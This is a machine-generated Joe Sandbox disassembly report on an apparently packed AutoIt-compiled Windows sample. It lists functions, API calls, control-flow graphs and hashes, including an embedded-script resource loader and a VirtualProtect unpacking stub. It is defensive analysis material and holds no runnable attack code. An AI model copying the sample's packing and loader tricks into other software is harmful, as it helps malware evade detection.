                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                  • String ID: ()$This is a third-party compiled AutoIt script.$runas
                                                                                                                  • API String ID: 438480954-3074634049
                                                                                                                  • Opcode ID: 911101bfa99a4a2c1694aaa81c53650571cf18c18bd1acecc32fedfae19b3832
                                                                                                                  • Instruction ID: 40fc8519e98e315818f8d54dffcf88788bc1f35f6b46e15e5d0277b6d96d67ac
                                                                                                                  • Opcode Fuzzy Hash: 911101bfa99a4a2c1694aaa81c53650571cf18c18bd1acecc32fedfae19b3832
                                                                                                                  • Instruction Fuzzy Hash: 44511730E09288AECF11BBB3EC45EFE7B75DF5AB84F0051A8F65177192CA6056498731
                                                                                                                  Function 00DE3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1169 de3742-de3762 1171 de3764-de3767 1169->1171 1172 de37c2-de37c4 1169->1172 1174 de37c8 1171->1174 1175 de3769-de3770 1171->1175 1172->1171 1173 de37c6 1172->1173 1176 de37ab-de37b3 NtdllDefWindowProc_W 1173->1176 1177 de37ce-de37d1 1174->1177 1178 e51e00-e51e2e call de2ff6 call dfe312 1174->1178 1179 de382c-de3834 PostQuitMessage 1175->1179 1180 de3776-de377b 1175->1180 1187 de37b9-de37bf 1176->1187 1181 de37f6-de381d SetTimer RegisterClipboardFormatW 1177->1181 1182 de37d3-de37d4 1177->1182 1216 e51e33-e51e3a 1178->1216 1186 de37f2-de37f4 1179->1186 1184 e51e88-e51e9c call e24ddd 1180->1184 1185 de3781-de3783 1180->1185 1181->1186 1191 de381f-de382a CreatePopupMenu 1181->1191 1188 de37da-de37ed KillTimer call de3847 call de390f 1182->1188 1189 e51da3-e51da6 1182->1189 1184->1186 1210 e51ea2 1184->1210 1192 de3789-de378e 1185->1192 1193 de3836-de3840 call dfeb83 1185->1193 1186->1187 1188->1186 1195 e51ddc-e51dfb MoveWindow 1189->1195 1196 e51da8-e51daa 1189->1196 1191->1186 1199 e51e6d-e51e74 1192->1199 1200 de3794-de3799 1192->1200 1211 de3845 1193->1211 1195->1186 1203 e51dac-e51daf 1196->1203 1204 e51dcb-e51dd7 SetFocus 1196->1204 1199->1176 1206 e51e7a-e51e83 call e1a5f3 1199->1206 1208 de379f-de37a5 1200->1208 1209 e51e58-e51e68 call e255bd 1200->1209 1203->1208 1212 e51db5-e51dc6 call de2ff6 1203->1212 1204->1186 1206->1176 1208->1176 1208->1216 1209->1186 1210->1176 1211->1186 1212->1186 1216->1176 1220 e51e40-e51e53 call de3847 call de4ffc 1216->1220 1220->1176
                                                                                                                  APIs
                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00DE37B3
                                                                                                                  • KillTimer.USER32(?,00000001), ref: 00DE37DD
                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DE3800
                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00DE380B
                                                                                                                  • CreatePopupMenu.USER32 ref: 00DE381F
                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00DE382E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                  • String ID: TaskbarCreated
                                                                                                                  • API String ID: 157504867-2362178303
                                                                                                                  • Opcode ID: 96fd05fc108684e8bbe16000bdfcc9c5dbc47fd892a5c6a3622139f642ab8414
                                                                                                                  • Instruction ID: a35c6b2d462a0838468e0599d86d7f0081799bf7deb268e59bc5bd667b9b4e26
                                                                                                                  • Opcode Fuzzy Hash: 96fd05fc108684e8bbe16000bdfcc9c5dbc47fd892a5c6a3622139f642ab8414
                                                                                                                  • Instruction Fuzzy Hash: 594155F52082D5AFDB107B2BEC8EB7A3A95FB4A341F041159F912B31A1CB60EE448771
                                                                                                                  Function 00DFDDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1237 dfddc0-dfde4f call ded7f7 GetVersionExW call de6a63 call dfdfb4 call de6571 1246 dfde55-dfde56 1237->1246 1247 e524c8-e524cb 1237->1247 1250 dfde58-dfde63 1246->1250 1251 dfde92-dfdea2 call dfdf77 1246->1251 1248 e524e4-e524e8 1247->1248 1249 e524cd 1247->1249 1254 e524d3-e524dc 1248->1254 1255 e524ea-e524f3 1248->1255 1253 e524d0 1249->1253 1256 dfde69-dfde6b 1250->1256 1257 e5244e-e52454 1250->1257 1264 dfdec7-dfdee1 1251->1264 1265 dfdea4-dfdec1 GetCurrentProcess call dfdf5f 1251->1265 1253->1254 1254->1248 1255->1253 1261 e524f5-e524f8 1255->1261 1262 e52469-e52475 1256->1262 1263 dfde71-dfde74 1256->1263 1259 e52456-e52459 1257->1259 1260 e5245e-e52464 1257->1260 1259->1251 1260->1251 1261->1254 1266 e52477-e5247a 1262->1266 1267 e5247f-e52485 1262->1267 1268 e52495-e52498 1263->1268 1269 dfde7a-dfde89 1263->1269 1274 dfdee3-dfdef7 call dfe00c 1264->1274 1275 dfdf31-dfdf3b GetSystemInfo 1264->1275 1265->1264 1288 dfdec3 1265->1288 1266->1251 1267->1251 1268->1251 1270 e5249e-e524b3 1268->1270 1271 dfde8f 1269->1271 1272 e5248a-e52490 1269->1272 1276 e524b5-e524b8 1270->1276 1277 e524bd-e524c3 1270->1277 1271->1251 1272->1251 1285 dfdf29-dfdf2f GetSystemInfo 1274->1285 1286 dfdef9-dfdf01 call dfdff4 GetNativeSystemInfo 1274->1286 1279 dfdf0e-dfdf1a 1275->1279 1276->1251 1277->1251 1281 dfdf1c-dfdf1f FreeLibrary 1279->1281 1282 dfdf21-dfdf26 1279->1282 1281->1282 1287 dfdf03-dfdf07 1285->1287 1286->1287 1287->1279 1291 dfdf09-dfdf0c FreeLibrary 1287->1291 1288->1264 1291->1279
                                                                                                                  APIs
                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00DFDDEC
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00E7DC38,?,?), ref: 00DFDEAC
                                                                                                                  • GetNativeSystemInfo.KERNELBASE(?,00E7DC38,?,?), ref: 00DFDF01
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00DFDF0C
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00DFDF1F
                                                                                                                  • GetSystemInfo.KERNEL32(?,00E7DC38,?,?), ref: 00DFDF29
                                                                                                                  • GetSystemInfo.KERNEL32(?,00E7DC38,?,?), ref: 00DFDF35
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3851250370-0
                                                                                                                  • Opcode ID: cc1fb47e2eaf1faf64252d5a754d951f2dd8d7a1651bc2aa15e1652d92b400e5
                                                                                                                  • Instruction ID: 3a56e55b312e44b841065a484545354c692dc031028b907e455ba8ccb438a52e
                                                                                                                  • Opcode Fuzzy Hash: cc1fb47e2eaf1faf64252d5a754d951f2dd8d7a1651bc2aa15e1652d92b400e5
                                                                                                                  • Instruction Fuzzy Hash: 9C61A57190A3C8CFCF15CF6498C15E97F76AF2A304B1A89D9D985AF207C624C509CB76
                                                                                                                  Function 00DE406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1339 de406b-de4083 CreateStreamOnHGlobal 1340 de4085-de409c FindResourceExW 1339->1340 1341 de40a3-de40a6 1339->1341 1342 e54f16-e54f25 LoadResource 1340->1342 1343 de40a2 1340->1343 1342->1343 1344 e54f2b-e54f39 SizeofResource 1342->1344 1343->1341 1344->1343 1345 e54f3f-e54f4a LockResource 1344->1345 1345->1343 1346 e54f50-e54f6e 1345->1346 1346->1343
                                                                                                                  APIs
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DE407B
                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00DE449E,?,?,00000000,00000001), ref: 00DE4092
                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,00DE449E,?,?,00000000,00000001,?,?,?,?,?,?,00DE41FB), ref: 00E54F1A
                                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00DE449E,?,?,00000000,00000001,?,?,?,?,?,?,00DE41FB), ref: 00E54F2F
                                                                                                                  • LockResource.KERNEL32(00DE449E,?,?,00DE449E,?,?,00000000,00000001,?,?,?,?,?,?,00DE41FB,00000000), ref: 00E54F42
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                  • String ID: SCRIPT
                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                  • Opcode ID: 9226d3a255ec2f148542bb595c1b01ea5211ef256513eebd93cad56097b03a05
                                                                                                                  • Instruction ID: de31eb6dbfa9c8d695e580270f94f6c79ac8427ad494e18fe0a834e9b5a7cea5
                                                                                                                  • Opcode Fuzzy Hash: 9226d3a255ec2f148542bb595c1b01ea5211ef256513eebd93cad56097b03a05
                                                                                                                  • Instruction Fuzzy Hash: 48115A70604741BFE7219B66EC48F277BB9EBC5B51F14416CF602A62A0DAB1DC049A30
                                                                                                                  Function 00F02F90 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00F030CA
                                                                                                                  • GetProcAddress.KERNEL32(?,00EFBFF9), ref: 00F030E8
                                                                                                                  • ExitProcess.KERNEL32(?,00EFBFF9), ref: 00F030F9
                                                                                                                  • VirtualProtect.KERNELBASE(00DE0000,00001000,00000004,?,00000000), ref: 00F03147
                                                                                                                  • VirtualProtect.KERNELBASE(00DE0000,00001000), ref: 00F0315C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1996367037-0
                                                                                                                  • Opcode ID: ff8fe61fb8099d3ab10884ec023bd6888ed0855fc32f54f031a77223337ee297
                                                                                                                  • Instruction ID: 24f3f6457a8b095784c44411749c37ab7f452af677c3554f97c7aec18dc07daa
                                                                                                                  • Opcode Fuzzy Hash: ff8fe61fb8099d3ab10884ec023bd6888ed0855fc32f54f031a77223337ee297
                                                                                                                  • Instruction Fuzzy Hash: 3C514872F453524BD7209AB8CCC4770BBA8EB453757280739D5E2C73C5EBA45A05B7A0
                                                                                                                  Function 00E26CA9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNELBASE(?,I/), ref: 00E26CB9
                                                                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00E26CCA
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00E26CDA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                                                  • String ID: I/
                                                                                                                  • API String ID: 48322524-530815126
                                                                                                                  • Opcode ID: 2b09fbcd14cb3738b03d25cdf6967aaad1b060483e9cb5ef08c112a6911495fc
                                                                                                                  • Instruction ID: fec251fed67e5b2220a6655bcfae9c9056dde29d44803fecee7b45237abd1c56
                                                                                                                  • Opcode Fuzzy Hash: 2b09fbcd14cb3738b03d25cdf6967aaad1b060483e9cb5ef08c112a6911495fc
                                                                                                                  • Instruction Fuzzy Hash: EBE0D831D154205B82107738FC0E4EA77ACDB0A379F501705F471E11D0E7F0D90445D5
                                                                                                                  Function 00DF3B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                                                  • String ID: @$ $ $
                                                                                                                  • API String ID: 3728558374-1762808387
                                                                                                                  • Opcode ID: 8d8bc87656382e2ca997a250bdbdda2f79a06fc357343c7484a91e2ba53071be
                                                                                                                  • Instruction ID: 0bcbb1805439a9f4e21353ba3aa027e93901308ad6909c3d46bccc78ea621b43
                                                                                                                  • Opcode Fuzzy Hash: 8d8bc87656382e2ca997a250bdbdda2f79a06fc357343c7484a91e2ba53071be
                                                                                                                  • Instruction Fuzzy Hash: 18727C74A042099FCB14DF94D881ABEB7B5EF48304F1AC059EE49BB291D731EE45CBA1
                                                                                                                  Function 00DF3200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3964851224-3209568608
                                                                                                                  • Opcode ID: 827965c8f32ef2c9e9d67f6212072240f5b3a5f33bd628c26a971f2cc940bc84
                                                                                                                  • Instruction ID: 3cb902f4162e7e3e9b0db7c918f6f1ce4fe9c58dceba17ab279d3d21e5826632
                                                                                                                  • Opcode Fuzzy Hash: 827965c8f32ef2c9e9d67f6212072240f5b3a5f33bd628c26a971f2cc940bc84
                                                                                                                  • Instruction Fuzzy Hash: D5926A70608345DFD714DF18C490B6AB7E1FF88308F1A885DEA8A9B352D771E945CB62
                                                                                                                  Function 00DEE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DEE959
                                                                                                                  • timeGetTime.WINMM ref: 00DEEBFA
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DEED2E
                                                                                                                  • TranslateMessage.USER32(?), ref: 00DEED3F
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00DEED4A
                                                                                                                  • LockWindowUpdate.USER32(00000000), ref: 00DEED79
                                                                                                                  • DestroyWindow.USER32 ref: 00DEED85
                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DEED9F
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00E55270
                                                                                                                  • TranslateMessage.USER32(?), ref: 00E559F7
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00E55A05
                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E55A19
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                  • API String ID: 2641332412-570651680
                                                                                                                  • Opcode ID: 12c1e665b252bdae175b7c89460180fd22bb763510ece2a03587748a78aa1364
                                                                                                                  • Instruction ID: 880f7de5787213990b2ef83009b9d460d28cf174e9b9cbb8af6d9389859419d8
                                                                                                                  • Opcode Fuzzy Hash: 12c1e665b252bdae175b7c89460180fd22bb763510ece2a03587748a78aa1364
                                                                                                                  • Instruction Fuzzy Hash: BB62B371508380CFD724EF25C895BAA77E4BF44304F18596DF986AB292D7B1D848CB72
                                                                                                                  Function 00E15C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ___createFile.LIBCMT ref: 00E15EC3
                                                                                                                  • ___createFile.LIBCMT ref: 00E15F04
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00E15F2D
                                                                                                                  • __dosmaperr.LIBCMT ref: 00E15F34
                                                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00E15F47
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00E15F6A
                                                                                                                  • __dosmaperr.LIBCMT ref: 00E15F73
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00E15F7C
                                                                                                                  • __set_osfhnd.LIBCMT ref: 00E15FAC
                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00E16016
                                                                                                                  • __close_nolock.LIBCMT ref: 00E1603C
                                                                                                                  • __chsize_nolock.LIBCMT ref: 00E1606C
                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00E1607E
                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00E16176
                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00E1618B
                                                                                                                  • __close_nolock.LIBCMT ref: 00E161EB
                                                                                                                    • Part of subcall function 00E0EA9C: CloseHandle.KERNELBASE(00000000,00E8EEF4,00000000,?,00E16041,00E8EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E0EAEC
                                                                                                                    • Part of subcall function 00E0EA9C: GetLastError.KERNEL32(?,00E16041,00E8EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E0EAF6
                                                                                                                    • Part of subcall function 00E0EA9C: __free_osfhnd.LIBCMT ref: 00E0EB03
                                                                                                                    • Part of subcall function 00E0EA9C: __dosmaperr.LIBCMT ref: 00E0EB25
                                                                                                                    • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00E1620D
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00E16342
                                                                                                                  • ___createFile.LIBCMT ref: 00E16361
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E1636E
                                                                                                                  • __dosmaperr.LIBCMT ref: 00E16375
                                                                                                                  • __free_osfhnd.LIBCMT ref: 00E16395
                                                                                                                  • __invoke_watson.LIBCMT ref: 00E163C3
                                                                                                                  • __wsopen_helper.LIBCMT ref: 00E163DD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 3896587723-2766056989
                                                                                                                  • Opcode ID: 4a0387eeda3f353d154bd3126cc7cf64f066b8634d669210795c0972da984dc4
                                                                                                                  • Instruction ID: 2cbe556c5036d8602a3cb2809c80b1369f2a3c794254005ffe956092f206804b
                                                                                                                  • Opcode Fuzzy Hash: 4a0387eeda3f353d154bd3126cc7cf64f066b8634d669210795c0972da984dc4
